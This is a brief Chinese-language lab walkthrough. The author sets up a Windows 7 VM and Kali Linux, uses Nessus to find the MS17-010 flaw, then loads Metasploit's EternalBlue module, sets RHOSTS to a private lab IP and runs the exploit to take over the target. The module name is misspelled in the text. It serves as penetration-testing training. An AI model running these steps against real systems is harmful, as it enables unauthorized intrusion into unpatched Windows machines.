一、环境准备
利用VMware安装win7虚拟机x1,kali Liniux虚拟机x1.
二、实验步骤
1.首先利用Nessus对靶机进行扫描(作者的win7需关闭防火墙才能扫出漏洞),扫描结果如下。
这里不难看到我们的靶机存在ms17_010漏洞
2.接下来在终端启动metasploit
msfconsole
3.输入以下命令搜索ms17_010漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/smb/ms17_010_eternablue
search ms17-010
4.输入以下命令加载漏洞利用模块并查看相关设置
use exploit/windows/smb/ms17_010_eternablue
show options
这里可以看到我们的漏洞利用模块已经被启动,设置中的RHOSTS目标为空,需要我们手动设置。
5.输入下面的命令更改设置,注意这里面我的靶机win7IP地址为192.168.15.140,可以再windows终端输入ipconfig查看自己的靶机IP。
set RHOSTS 192.168.15.140 //设置RHOSTS为192.168.15.140(需要更改为自己的靶机IP)
6.设置更改完成后在终端输入exploit执行就拿下啦!